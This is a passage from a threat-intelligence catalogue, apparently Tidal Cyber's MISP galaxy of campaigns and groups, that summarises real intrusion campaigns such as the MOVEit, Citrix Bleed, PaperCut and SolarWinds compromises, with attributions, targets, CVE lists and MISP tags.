[C0026](https://app.tidalcyber.com/campaigns/41f283a1-b2ac-547d-98d5-ff907afd08c7) was a campaign identified in September 2022 that included the selective distribution of [KOPILUWAK](https://app.tidalcyber.com/software/d09c4459-1aa3-547d-99f4-7ac73b8043f0) and [QUIETCANARY](https://app.tidalcyber.com/software/52d3515c-5184-5257-bf24-56adccb4cccd) malware to previous [ANDROMEDA](https://app.tidalcyber.com/software/69aac793-9e6a-5167-bc62-823189ee2f7b) malware victims in Ukraine through re-registered [ANDROMEDA](https://app.tidalcyber.com/software/69aac793-9e6a-5167-bc62-823189ee2f7b) C2 domains. Several tools and tactics used during [C0026](https://app.tidalcyber.com/campaigns/41f283a1-b2ac-547d-98d5-ff907afd08c7) were consistent with historic [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) operations.<sup>[[Mandiant Suspected Turla Campaign February 2023](https://app.tidalcyber.com/references/d8f43a52-a59e-5567-8259-821b1b6bde43)]</sup>

The tag is: misp-galaxy:campaigns="C0026"

C0027

[C0027](https://app.tidalcyber.com/campaigns/a9719584-4f52-5a5d-b0f7-1059e715c2b8) was a financially-motivated campaign linked to [Scattered Spider](https://app.tidalcyber.com/groups/3d77fb6c-cfb4-5563-b0be-7aa1ad535337) that targeted telecommunications and business process outsourcing (BPO) companies from at least June through December of 2022. During [C0027](https://app.tidalcyber.com/campaigns/a9719584-4f52-5a5d-b0f7-1059e715c2b8) [Scattered Spider](https://app.tidalcyber.com/groups/3d77fb6c-cfb4-5563-b0be-7aa1ad535337) used various forms of social engineering, performed SIM swapping, and attempted to leverage access from victim environments to mobile carrier networks.<sup>[[Crowdstrike TELCO BPO Campaign December 2022](https://app.tidalcyber.com/references/382785e1-4ef3-506e-b74f-cd07df9ae46e)]</sup>

The tag is: misp-galaxy:campaigns="C0027"

Clop MOVEit Transfer Vulnerability Exploitation

In June 2023, U.S. authorities released Cybersecurity Advisory AA23-158A, which detailed observed exploits of a zero-day SQL injection vulnerability (CVE-2023-34362) affecting Progress Software’s managed file transfer (MFT) solution, MOVEit Transfer. According to the Advisory, exploit activity began on May 27, 2023, as threat actors, which the Advisory attributed to "CL0P Ransomware Gang, also known as TA505", began compromising internet-facing MOVEit Transfer web applications. Actors deployed web shells, dubbed LEMURLOOT, on compromised MOVEit applications, which enabled persistence, discovery of files and folders stored on MOVEit servers, and staging and exfiltration of compressed victim data. Authorities indicated they expected to see "widespread exploitation of unpatched software services in both private and public networks".<sup>[[U.S. CISA CL0P CVE-2023-34362 Exploitation](/references/07e48ca8-b965-4234-b04a-dfad45d58b22)]</sup> Progress Software acknowledged the vulnerability and issued guidance on known affected versions, software upgrades, and patching.<sup>[[Progress Software MOVEit Transfer Critical Vulnerability](/references/9f364e22-b73c-4f3a-902c-a3f0eb01a2b9)]</sup>

Related Vulnerabilities: CVE-2023-34362<sup>[[U.S. CISA CL0P CVE-2023-34362 Exploitation](/references/07e48ca8-b965-4234-b04a-dfad45d58b22)]</sup>

The tag is: misp-galaxy:campaigns="Clop MOVEit Transfer Vulnerability Exploitation"

CostaRicto

[CostaRicto](https://app.tidalcyber.com/campaigns/fb011ed2-bfb9-4f0f-bd88-8b3fa0cf9b48) was a suspected hacker-for-hire cyber espionage campaign that targeted multiple industries worldwide, with a large number being financial institutions. [CostaRicto](https://app.tidalcyber.com/campaigns/fb011ed2-bfb9-4f0f-bd88-8b3fa0cf9b48) actors targeted organizations in Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia (especially India, Bangladesh, and Singapore), using custom malware, open source tools, and a complex network of proxies and SSH tunnels.<sup>[[BlackBerry CostaRicto November 2020](https://app.tidalcyber.com/references/93a23447-641c-4ee2-9fbd-64b2adea8a5f)]</sup>

The tag is: misp-galaxy:campaigns="CostaRicto"

Defense Sector Supply Chain Compromise by North Korea-Linked Actors

German and South Korean cybersecurity authorities published an advisory highlighting recent attempts by North Korea-linked cyber actors to target enterprises and research centers in the defense sector. The advisory detailed a supply chain attack, attributed to an unnamed threat group, in which actors compromised a company that maintained a defense sector research center’s web servers, then used stolen SSH credentials to remotely access the research center’s network. The actors then used various methods to evade defenses, including impersonating security staff, deployed malware via a patch management system, and stole account information and email contents before being evicted from the network.<sup>[[BfV North Korea February 17 2024](/references/cc76be15-6d9d-40b2-b7f3-196bb0a7106a)]</sup>

The tag is: misp-galaxy:campaigns="Defense Sector Supply Chain Compromise by North Korea-Linked Actors"

FIN12 March 2023 Hospital Center Intrusion

In September 2023, French cybersecurity authorities released advisory CERTFR-2023-CTI-007, which detailed a network intrusion of the Regional and University Hospital Center of Brest, in northwestern France. Actors used valid credentials belonging to a healthcare professional to connect to a remote desktop service exposed to the Internet, then installed Cobalt Strike and SystemBC to provide backdoor network access. Authorities indicated that the credentials were likely compromised via unspecified infostealer malware.

The actors used multiple third-party tools for credential access and discovery, and they attempted to exploit at least five vulnerabilities for privilege escalation and lateral movement. Authorities worked with hospital personnel to isolate affected systems and disrupt the intrusion before suspected data exfiltration and encryption could take place. Based on infrastructural and behavioral overlaps with other incidents, officials attributed the intrusion to the FIN12 financially motivated actor group and indicated the same actors are responsible for dozens of attacks on French victims in recent years.

Additional details, indicators of compromise, and the observed Cobalt Strike configuration can be found in the [source report](/references/0f4a03c5-79b3-418e-a77d-305d5a32caca).<sup>[[CERTFR-2023-CTI-007](/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]</sup>

Related Vulnerabilities: CVE-2023-21746, CVE-2022-24521, CVE-2021-34527, CVE-2019-0708, CVE-2020-1472<sup>[[CERTFR-2023-CTI-007](/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]</sup>

The tag is: misp-galaxy:campaigns="FIN12 March 2023 Hospital Center Intrusion"

Frankenstein

[Frankenstein](https://app.tidalcyber.com/campaigns/2fab9878-8aae-445a-86db-6b47b473f56b) was described by security researchers as a highly-targeted campaign conducted by moderately sophisticated and highly resourceful threat actors in early 2019. The unidentified actors primarily relied on open source tools, including [Empire](https://app.tidalcyber.com/software/fea655ac-558f-4dd0-867f-9a5553626207). The campaign name refers to the actors' ability to piece together several unrelated open-source tool components.<sup>[[Talos Frankenstein June 2019](https://app.tidalcyber.com/references/a6faa495-db01-43e8-9db3-d446570802bc)]</sup>

The tag is: misp-galaxy:campaigns="Frankenstein"

FunnyDream

[FunnyDream](https://app.tidalcyber.com/campaigns/94587edf-0292-445b-8c66-b16629597f1e) was a suspected Chinese cyber espionage campaign that targeted government and foreign organizations in Malaysia, the Philippines, Taiwan, Vietnam, and other parts of Southeast Asia. Security researchers linked the [FunnyDream](https://app.tidalcyber.com/campaigns/94587edf-0292-445b-8c66-b16629597f1e) campaign to possible Chinese-speaking threat actors through the use of the [Chinoxy](https://app.tidalcyber.com/software/7c36563a-9143-4766-8aef-4e1787e18d8c) backdoor and noted infrastructure overlap with the TAG-16 threat group.<sup>[[Bitdefender FunnyDream Campaign November 2020](https://app.tidalcyber.com/references/b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de)]</sup><sup>[[Kaspersky APT Trends Q1 2020](https://app.tidalcyber.com/references/23c91719-5ebe-4d03-8018-df1809fffd2f)]</sup><sup>[[Recorded Future Chinese Activity in Southeast Asia December 2021](https://app.tidalcyber.com/references/0809db3b-81a8-475d-920a-cb913b30f42e)]</sup>

The tag is: misp-galaxy:campaigns="FunnyDream"

Iranian APT Credential Harvesting & Cryptomining Activity

In November 2022, U.S. cybersecurity authorities released Cybersecurity Advisory AA22-320A, which detailed an incident response engagement at an unspecified U.S. Federal Civilian Executive Branch organization. Authorities assessed that the network compromise was carried out by unspecified Iranian government-sponsored advanced persistent threat (APT) actors. The actors achieved initial network access by exploiting the Log4Shell vulnerability in an unpatched VMware Horizon server. Post-exploit activities included installing XMRig crypto mining software and executing Mimikatz to harvest credentials, as well as moving laterally to the domain controller and implanting Ngrok reverse proxies on multiple hosts to maintain persistence.

Additional details, including incident response guidance and relevant mitigations, can be found in the [source report](/references/daae1f54-8471-4620-82d5-023d04144acd).<sup>[[U.S. CISA Advisory November 25 2022](/references/daae1f54-8471-4620-82d5-023d04144acd)]</sup>

Related Vulnerabilities: CVE-2021-44228<sup>[[U.S. CISA Advisory November 25 2022](/references/daae1f54-8471-4620-82d5-023d04144acd)]</sup>

The tag is: misp-galaxy:campaigns="Iranian APT Credential Harvesting & Cryptomining Activity"

Iranian APT Targeting U.S. Voter Data

In November 2020, U.S. cybersecurity authorities released joint Cybersecurity Advisory AA20-304A, which detailed efforts by an unspecified Iranian advanced persistent threat (APT) actor to target U.S. state websites, including election-related sites, with the goal of obtaining voter registration data. The actors used a legitimate vulnerability scanner, Acunetix, to scan state election websites, and they attempted to exploit sites with directory traversal, SQL injection, and web shell upload attacks. Authorities confirmed the actors successfully obtained voter registration data in at least one state – after abusing a website misconfiguration, they used a cURL-based scripting tool to iterate through and retrieve voter records. Officials assessed that the actor behind the website attacks is responsible for mass dissemination of intimidation emails to U.S. citizens and a disinformation campaign featuring a U.S. election-related propaganda video in mid-October 2020. Authorities furthermore assessed that information obtained during the website attacks was featured in the propaganda video.<sup>[[U.S. CISA Iran Voter Data November 3 2020](/references/be89be75-c33f-4c58-8bf0-979c1debaad7)]</sup>

The tag is: misp-galaxy:campaigns="Iranian APT Targeting U.S. Voter Data"

Iranian IRGC Data Extortion Operations

In September 2022, U.S., Canadian, United Kingdom, and Australian cybersecurity authorities released joint Cybersecurity Advisory AA22-257A, which detailed malicious cyber activity attributed to advanced persistent threat (APT) actors affiliated with the Iranian government’s Islamic Revolutionary Guard Corps (IRGC). The advisory updated a previous alert (AA21-321A), published in November 2021, and summarized recent activities linked to the actors. Since at least March 2021, the actors were observed targeting victims in a wide range of U.S. critical infrastructure sectors, including transportation and healthcare, and victims in unspecified sectors in Australia, Canada, and the United Kingdom.

The actors typically exploited vulnerabilities to gain initial network access. They were observed exploiting vulnerabilities in Microsoft Exchange servers (ProxyShell) and Fortinet devices in 2021, and VMware Horizon (Log4j) in 2022. After gaining access, the actors typically evaluated the perceived value of data held within a victim network and either encrypted it for ransom and/or exfiltrated it. The actors are believed to have sold some exfiltrated data or used it as leverage to further pressure victims into paying a ransom.

In addition to behavioral observations and indicators of compromise, the advisories provided detection and mitigation guidance, which can be found in the source reports [here](https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-257a) and [here](https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a).

Related Vulnerabilities: CVE-2021-34523, CVE-2021-31207, CVE-2021-44228, CVE-2021-45046, CVE-2021-45105<sup>[[U.S. CISA IRGC Actors September 14 2022](/references/728b20b0-f702-4dbe-afea-50270648a3a2)]</sup>, CVE-2021-34473, CVE-2018-13379, CVE-2020-12812, CVE-2019-5591<sup>[[U.S. CISA Iranian Government Actors November 19 2021](/references/d7014279-bc6a-43d4-953a-a6bc1d97a13b)]</sup>

The tag is: misp-galaxy:campaigns="Iranian IRGC Data Extortion Operations"

Ivanti Gateway Vulnerability Exploits

This object represents a collection of MITRE ATT&CK® Techniques and other objects (Groups and/or Software) related to joint Cybersecurity Advisory AA24-060B, which detailed recent exploits of vulnerabilities (CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893) affecting Ivanti Connect Secure and Policy Secure VPN and gateway appliances by unspecified threat actors. Further background and contextual details can be found in the associated references.

The tag is: misp-galaxy:campaigns="Ivanti Gateway Vulnerability Exploits"

June 2023 Citrix Vulnerability Exploitation

In July 2023, U.S. Cybersecurity & Infrastructure Security Agency authorities released Cybersecurity Advisory AA23-201A, which detailed an observed exploit of a zero-day vulnerability (CVE-2023-3519) affecting NetScaler (formerly Citrix) Application Delivery Controller ("ADC") and NetScaler Gateway appliances. According to the Advisory, the exploitation activity occurred in June 2023, and the victim (an undisclosed entity in the critical infrastructure sector) reported it in July 2023.<sup>[[U.S. CISA CVE-2023-3519 Exploits](/references/021c4caa-7a7a-4e49-9c5c-6eec176bf923)]</sup> Citrix acknowledged the reported exploit of the vulnerability, which enables unauthenticated remote code execution, and released a patch on July 18, 2023.<sup>[[Citrix Bulletin CVE-2023-3519](/references/245ef1b7-778d-4df2-99a9-b51c95c57580)]</sup>

After achieving initial access via exploit of CVE-2023-3519, threat actors dropped a web shell on the vulnerable ADC appliance, which was present on a non-production environment. The web shell enabled subsequent information discovery on the victim’s Active Directory ("AD"), followed by collection and exfiltration of AD-related data. The actors also attempted lateral movement to a domain controller, but the Advisory indicated that network segmentation controls for the ADC appliance blocked this attempted activity.<sup>[[U.S. CISA CVE-2023-3519 Exploits](/references/021c4caa-7a7a-4e49-9c5c-6eec176bf923)]</sup> Separately, in a blog on CVE-2023-3519 exploit investigations released the day after the CISA Advisory, Mandiant indicated that the type of activity observed is "consistent with previous operations by China-nexus actors".<sup>[[Mandiant CVE-2023-3519 Exploitation](/references/4404ed65-3020-453d-8c51-2885018ba03b)]</sup>

Related Vulnerabilities: CVE-2023-3519<sup>[[U.S. CISA CVE-2023-3519 Exploits](/references/021c4caa-7a7a-4e49-9c5c-6eec176bf923)]</sup>

The tag is: misp-galaxy:campaigns="June 2023 Citrix Vulnerability Exploitation"

LockBit Affiliate Citrix Bleed Exploits

In November 2023, U.S. cybersecurity authorities and international partners released Cybersecurity Advisory AA23-325A, which detailed observed exploitation of CVE-2023-4966 (known colloquially as the “Citrix Bleed” vulnerability) by threat actors believed to be affiliated with the LockBit ransomware operation.

Citrix Bleed is a vulnerability in Citrix NetScaler web application delivery control (“ADC”) and NetScaler Gateway appliances, which allows adversaries to bypass password requirements and multifactor authentication, enabling hijacking of legitimate user sessions and subsequent credential harvesting, lateral movement, and data or resource access. Authorities indicated that they expected “widespread” Citrix Bleed exploitation on unpatched services due to the ease of carrying out the exploit.

After successful Citrix Bleed exploitation, LockBit affiliates were observed using a variety of follow-on TTPs and using a range of software, including abuse of native utilities and popular legitimate remote management and monitoring (“RMM”) tools. Indicators of compromise associated with recent intrusions and further incident response and mitigation guidance can be found in the [source report](/references/21f56e0c-9605-4fbb-9cb1-f868ba6eb053).<sup>[[U.S. CISA LockBit Citrix Bleed November 21 2023](/references/21f56e0c-9605-4fbb-9cb1-f868ba6eb053)]</sup> Public reporting suggested that actors associated with the Medusa and Qilin ransomware operations, plus other unknown ransomware and uncategorized actors, had also exploited Citrix Bleed as part of their operations.<sup>[[Malwarebytes Citrix Bleed November 24 2023](/references/fdc86cea-0015-48d1-934f-b22244de6306)]</sup><sup>[[Cybernews Yanfeng Qilin November 2023](/references/93c89ca5-1863-4ee2-9fff-258f94f655c4)]</sup>

The tag is: misp-galaxy:campaigns="LockBit Affiliate Citrix Bleed Exploits"

Night Dragon

[Night Dragon](https://app.tidalcyber.com/campaigns/85f136b3-d5a3-4c4c-a37c-40e4418dc989) was a cyber espionage campaign that targeted oil, energy, and petrochemical companies, along with individuals and executives in Kazakhstan, Taiwan, Greece, and the United States. The unidentified threat actors searched for information related to oil and gas field production systems, financials, and collected data from SCADA systems. Based on the observed techniques, tools, and network activities, security researchers assessed the campaign involved a threat group based in China.<sup>[[McAfee Night Dragon](https://app.tidalcyber.com/references/242d2933-ca2b-4511-803a-454727a3acc5)]</sup>

The tag is: misp-galaxy:campaigns="Night Dragon"

Operation CuckooBees

[Operation CuckooBees](https://app.tidalcyber.com/campaigns/81bf4e45-f0d3-4fec-a9d4-1259cf8542a1) was a cyber espionage campaign targeting technology and manufacturing companies in East Asia, Western Europe, and North America since at least 2019. Security researchers noted the goal of [Operation CuckooBees](https://app.tidalcyber.com/campaigns/81bf4e45-f0d3-4fec-a9d4-1259cf8542a1), which was still ongoing as of May 2022, was likely the theft of proprietary information, research and development documents, source code, and blueprints for various technologies. Researchers assessed [Operation CuckooBees](https://app.tidalcyber.com/campaigns/81bf4e45-f0d3-4fec-a9d4-1259cf8542a1) was conducted by actors affiliated with [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b), [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9), and BARIUM.<sup>[[Cybereason OperationCuckooBees May 2022](https://app.tidalcyber.com/references/fe3e2c7e-2287-406c-b717-cf7721b5843a)]</sup>

The tag is: misp-galaxy:campaigns="Operation CuckooBees"

Operation Dream Job

[Operation Dream Job](https://app.tidalcyber.com/campaigns/9a94e646-cbe5-54a1-8bf6-70ef745e641b) was a cyber espionage operation likely conducted by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) that targeted the defense, aerospace, government, and other sectors in the United States, Israel, Australia, Russia, and India. In at least one case, the cyber actors tried to monetize their network access to conduct a business email compromise (BEC) operation. In 2020, security researchers noted overlapping TTPs, to include fake job lures and code similarities, between [Operation Dream Job](https://app.tidalcyber.com/campaigns/9a94e646-cbe5-54a1-8bf6-70ef745e641b), Operation North Star, and Operation Interception; by 2022 security researchers described [Operation Dream Job](https://app.tidalcyber.com/campaigns/9a94e646-cbe5-54a1-8bf6-70ef745e641b) as an umbrella term covering both Operation Interception and Operation North Star.<sup>[[ClearSky Lazarus Aug 2020](https://app.tidalcyber.com/references/2827e6e4-8163-47fb-9e22-b59e59cd338f)]</sup><sup>[[McAfee Lazarus Jul 2020](https://app.tidalcyber.com/references/43581a7d-d71a-4121-abb6-127483a49d12)]</sup><sup>[[ESET Lazarus Jun 2020](https://app.tidalcyber.com/references/b16a0141-dea3-4b34-8279-7bc1ce3d7052)]</sup><sup>[[The Hacker News Lazarus Aug 2022](https://app.tidalcyber.com/references/8ae38830-1547-5cc1-83a4-87c3a7c82aa6)]</sup>

The tag is: misp-galaxy:campaigns="Operation Dream Job"

Operation Dust Storm

[Operation Dust Storm](https://app.tidalcyber.com/campaigns/af0c0f55-dc4f-4cb5-9350-3a2d7c07595f) was a long-standing persistent cyber espionage campaign that targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. By 2015, the [Operation Dust Storm](https://app.tidalcyber.com/campaigns/af0c0f55-dc4f-4cb5-9350-3a2d7c07595f) threat actors shifted from government and defense-related intelligence targets to Japanese companies or Japanese subdivisions of larger foreign organizations supporting Japan’s critical infrastructure, including electricity generation, oil and natural gas, finance, transportation, and construction.<sup>[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]</sup>

[Operation Dust Storm](https://app.tidalcyber.com/campaigns/af0c0f55-dc4f-4cb5-9350-3a2d7c07595f) threat actors also began to use Android backdoors in their operations by 2015, with all identified victims at the time residing in Japan or South Korea.<sup>[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]</sup>

The tag is: misp-galaxy:campaigns="Operation Dust Storm"

Operation Ghost

[Operation Ghost](https://app.tidalcyber.com/campaigns/1fcfe949-5f96-578e-86ad-069ba123c867) was an [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) campaign starting in 2013 that included operations against ministries of foreign affairs in Europe and the Washington, D.C. embassy of a European Union country. During [Operation Ghost](https://app.tidalcyber.com/campaigns/1fcfe949-5f96-578e-86ad-069ba123c867), [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) used new families of malware and leveraged web services, steganography, and unique C2 infrastructure for each victim.<sup>[[ESET Dukes October 2019](https://app.tidalcyber.com/references/fbc77b85-cc5a-4c65-956d-b8556974b4ef)]</sup>

The tag is: misp-galaxy:campaigns="Operation Ghost"

Operation Honeybee

[Operation Honeybee](https://app.tidalcyber.com/campaigns/f741ed36-2d52-40ae-bbdc-70722f4071c7) was a campaign that targeted humanitarian aid and inter-Korean affairs organizations from at least late 2017 through early 2018. [Operation Honeybee](https://app.tidalcyber.com/campaigns/f741ed36-2d52-40ae-bbdc-70722f4071c7) initially targeted South Korea, but expanded to include Vietnam, Singapore, Japan, Indonesia, Argentina, and Canada. Security researchers assessed the threat actors were likely Korean speakers based on metadata used in both lure documents and executables, and named the campaign "Honeybee" after the author name discovered in malicious Word documents.<sup>[[McAfee Honeybee](https://app.tidalcyber.com/references/e6f0f7b5-01fe-437f-a9c9-2ea054e7d69d)]</sup>

The tag is: misp-galaxy:campaigns="Operation Honeybee"

Operation Sharpshooter

[Operation Sharpshooter](https://app.tidalcyber.com/campaigns/57e858c8-fd0b-4382-a178-0165d03aa8a9) was a global cyber espionage campaign that targeted nuclear, defense, government, energy, and financial companies, with many located in Germany, Turkey, the United Kingdom, and the United States. Security researchers noted the campaign shared many similarities with previous [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) operations, including fake job recruitment lures and shared malware code.<sup>[[McAfee Sharpshooter December 2018](https://app.tidalcyber.com/references/96b6d012-8620-4ef5-bf9a-5f88e465a495)]</sup><sup>[[Bleeping Computer Op Sharpshooter March 2019](https://app.tidalcyber.com/references/84430646-6568-4288-8710-2827692a8862)]</sup><sup>[[Threatpost New Op Sharpshooter Data March 2019](https://app.tidalcyber.com/references/2361b5b1-3a01-4d77-99c6-261f444a498e)]</sup>

The tag is: misp-galaxy:campaigns="Operation Sharpshooter"

Operation Spalax

[Operation Spalax](https://app.tidalcyber.com/campaigns/98d3a8ac-6af9-4471-83f6-e880ca70261f) was a campaign that primarily targeted Colombian government organizations and private companies, particularly those associated with the energy and metallurgical industries. The [Operation Spalax](https://app.tidalcyber.com/campaigns/98d3a8ac-6af9-4471-83f6-e880ca70261f) threat actors distributed commodity malware and tools using generic phishing topics related to COVID-19, banking, and law enforcement action. Security researchers noted indicators of compromise and some infrastructure overlaps with other campaigns dating back to April 2018, including at least one separately attributed to [APT-C-36](https://app.tidalcyber.com/groups/153c14a6-31b7-44f2-892e-6d9fdc152267), but identified enough differences to report this as separate, unattributed activity.<sup>[[ESET Operation Spalax Jan 2021](https://app.tidalcyber.com/references/b699dd10-7d3f-4542-bf8a-b3f0c747bd0e)]</sup>

The tag is: misp-galaxy:campaigns="Operation Spalax"

Operation Wocao

[Operation Wocao](https://app.tidalcyber.com/campaigns/56e4e10f-8c8c-4b7c-8355-7ed89af181be) was a cyber espionage campaign that targeted organizations around the world, including in Brazil, China, France, Germany, Italy, Mexico, Portugal, Spain, the United Kingdom, and the United States. The suspected China-based actors compromised government organizations and managed service providers, as well as aviation, construction, energy, finance, health care, insurance, offshore engineering, software development, and transportation companies.<sup>[[FoxIT Wocao December 2019](https://app.tidalcyber.com/references/aa3e31c7-71cd-4a3f-b482-9049c9abb631)]</sup>

Security researchers assessed the [Operation Wocao](https://app.tidalcyber.com/campaigns/56e4e10f-8c8c-4b7c-8355-7ed89af181be) actors used similar TTPs and tools as APT20, suggesting a possible overlap. [Operation Wocao](https://app.tidalcyber.com/campaigns/56e4e10f-8c8c-4b7c-8355-7ed89af181be) was named after an observed command line entry by one of the threat actors, possibly out of frustration from losing webshell access.<sup>[[FoxIT Wocao December 2019](https://app.tidalcyber.com/references/aa3e31c7-71cd-4a3f-b482-9049c9abb631)]</sup>

The tag is: misp-galaxy:campaigns="Operation Wocao"

PaperCut Vulnerability Exploitation

In May 2023, U.S. Cybersecurity & Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) authorities released Cybersecurity Advisory AA23-131A, which detailed observed exploits of a vulnerability, CVE-2023-27350, affecting certain versions of PaperCut NG and PaperCut MF, software applications for print management. PaperCut released a patch for the vulnerability in March 2023.<sup>[[PaperCut MF/NG vulnerability bulletin](/references/d6e71b45-fc91-40f4-8201-2186994ae42a)]</sup> According to the Advisory, authorities observed unspecified threat actors exploiting the vulnerability in mid-April 2023, followed by exploitation by the self-identified Bl00dy Ransomware Gang the following month.<sup>[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]</sup>

CVE-2023-27350 allows a remote actor to bypass authentication and remotely execute code on servers running affected versions of PaperCut software. In May, U.S. authorities observed Bl00dy Ransomware Gang actors exploiting the vulnerability to achieve initial access into education sector entities' networks and ingressing both legitimate remote management and maintenance (RMM) tools and several other command and control-related malware, including Lizar, Truebot, and Cobalt Strike. In some cases, the actors ultimately exfiltrated victim data and encrypted files, demanding payment in order to decrypt affected systems (the Advisory did not indicate how precisely actors encrypted data). The Advisory indicated that the "Education Facilities Subsector" maintains nearly 70% of exposed (but not necessarily vulnerable) U.S.-based PaperCut servers.<sup>[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]</sup>

The Advisory instructed defenders to focus CVE-2023-27350 detection efforts on three areas: network traffic signatures, system monitoring, and server settings and log files. More details and resources for detection can be found in the [source report](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a).

Related Vulnerabilities: CVE-2023-27350<sup>[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]</sup>

The tag is: misp-galaxy:campaigns="PaperCut Vulnerability Exploitation"

Pikabot Distribution Campaigns 2023

This is a single object to represent the initial access and delivery methods observed with Pikabot distribution in the first year after its discovery. Distribution campaigns have been linked to the TA577 threat actor (previously known for distributing payloads including QakBot, IcedID, SystemBC, and Cobalt Strike)<sup>[[Malwarebytes Pikabot December 15 2023](/references/50b29ef4-7ade-4672-99b6-fdf367170a5b)]</sup><sup>[[Unit42 Malware Roundup December 29 2023](/references/a18e19b5-9046-4c2c-bd94-2cd5061064bf)]</sup>; however, the Technique- and Procedure level intelligence associated with these campaigns that is provided below was not explicitly linked to that group, so we are providing this intelligence to users in this Campaign form. The Water Curupira intrusion set (affiliated with the Black Basta ransomware operation) has also been observed distributing Pikabot.<sup>[[Trend Micro Pikabot January 9 2024](/references/dc7d882b-4e83-42da-8e2f-f557b675930a)]</sup>

The tag is: misp-galaxy:campaigns="Pikabot Distribution Campaigns 2023"

SolarWinds Compromise

The [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a) was a sophisticated supply chain cyber operation conducted by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) that was discovered in mid-December 2020. [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) used customized malware to inject malicious code into the SolarWinds Orion software build process that was later distributed through a normal software update; they also used password spraying, token theft, API abuse, spear phishing, and other supply chain attacks to compromise user accounts and leverage their associated access. Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting initially referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.<sup>[[SolarWinds Advisory Dec 2020](https://app.tidalcyber.com/references/4e8b908a-bdc5-441b-bc51-98dfa87f6b7a)]</sup><sup>[[SolarWinds Sunburst Sunspot Update January 2021](https://app.tidalcyber.com/references/1be1b6e0-1b42-4d07-856b-b6321c17bb88)]</sup><sup>[[FireEye SUNBURST Backdoor December 2020](https://app.tidalcyber.com/references/d006ed03-a8af-4887-9356-3481d81d43e4)]</sup><sup>[[Volexity SolarWinds](https://app.tidalcyber.com/references/355cecf8-ef3e-4a6e-a652-3bf26fe46d88)]</sup><sup>[[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]</sup><sup>[[Unit 42 SolarStorm December 2020](https://app.tidalcyber.com/references/ecbb602a-2427-5eba-8c2b-25d90c95f166)]</sup><sup>[[Microsoft Analyzing Solorigate Dec 2020](https://app.tidalcyber.com/references/8ad72d46-ba2c-426f-bb0d-eb47723c8e11)]</sup><sup>[[Microsoft Internal Solorigate Investigation Blog](https://app.tidalcyber.com/references/66cade99-0040-464c-98a6-bba57719f0a4)]</sup>

In April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a) to Russia’s Foreign Intelligence Service (SVR); public statements included citations to [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447), Cozy Bear, and The Dukes.<sup>[[NSA Joint Advisory SVR SolarWinds April 2021](https://app.tidalcyber.com/references/43d9c469-1d54-454b-ba67-74e7f1de9c10)]</sup><sup>[[UK NSCS Russia SolarWinds April 2021](https://app.tidalcyber.com/references/f49e6780-8caa-4c3c-8d68-47a2cc4319a1)]</sup><sup>[[Mandiant UNC2452 APT29 April 2022](https://app.tidalcyber.com/references/5276508c-6792-56be-b757-e4b495ef6c37)]</sup> The US government assessed that of the approximately 18,000 affected public and private sector customers of SolarWinds’ Orion product, a much smaller number were compromised by follow-on [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) activity on their systems.<sup>[[USG Joint Statement SolarWinds January 2021](https://app.tidalcyber.com/references/336a6549-a95d-5763-bbaf-5ef0d3141800)]</sup>

The tag is: misp-galaxy:campaigns="SolarWinds Compromise"

Tidal Groups

Tidal Groups Galaxy.

Tidal Groups is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Tidal Cyber

admin@338

[admin@338](https://app.tidalcyber.com/groups/8567136b-f84a-45ed-8cce-46324c7da60e) is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as [PoisonIvy](https://app.tidalcyber.com/software/1d87a695-7989-49ae-ac1a-b6601db565c3), as well as some non-public backdoors. <sup>[[FireEye admin@338](https://app.tidalcyber.com/references/f3470275-9652-440e-914d-ad4fc5165413)]</sup>

The tag is: misp-galaxy:groups="admin@338"

Operation Woolen-Goldfish - Associated Group

